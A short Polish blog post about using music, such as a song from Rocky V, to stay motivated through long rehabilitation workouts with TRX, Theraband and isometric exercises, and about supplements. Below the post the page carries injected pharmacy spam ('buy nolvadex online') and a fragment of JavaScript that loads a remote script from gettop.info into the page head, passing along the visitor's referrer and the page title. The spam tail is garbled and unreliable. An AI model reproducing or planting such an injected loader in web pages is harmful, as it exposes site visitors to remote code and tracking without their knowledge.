Motywacja-muzyka

5.09.2011 / Mariusz Cieśliński

Pomaga mi w dniach braku ochoty do wykonywania mozolnych i żmudnych ćwiczeń muza.Jest parę fajnych kawałków pomagające się pozbierać do treningu.Joey B. Ellis – Go For It (Rocky V)

Jednym z nich jest powyższy utworek z Rocky V. Odsłuchując przed treningiem czuję,że S.A.W, Vitargo, JointXpack,Collagen Renover,Isolate 100 Whey i cała ekipa supli z Treca szbciej zaczyna się buzować w moich żyłach.

Treningi moje mimo,że rehabilitacyjne trwają po 3-5 godzin dziennie.TRX,Theraband i izometryczne ćwiczenia naprawdę są wyczerpujące.Zwłaszcza,że nie daję sobie taryfy ulgowej.

Monotonia izometrii nie pasuje do mojego charakteru.Jednak wiem,że bez tych ćwieczeń nie miałbym postępu-widzę go z każdym dniem i sam muszę się kontrolować,aby nie „przedobrzyć”.   :)

Mariusz Cieslinski q online

Buy Purchase Mariusz Cieslinski P2 online

Mariusz Cieslinski P

 

 

  Cheap Pills online buy nolvadex online with master card s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‚head’)[0].appendChild(s);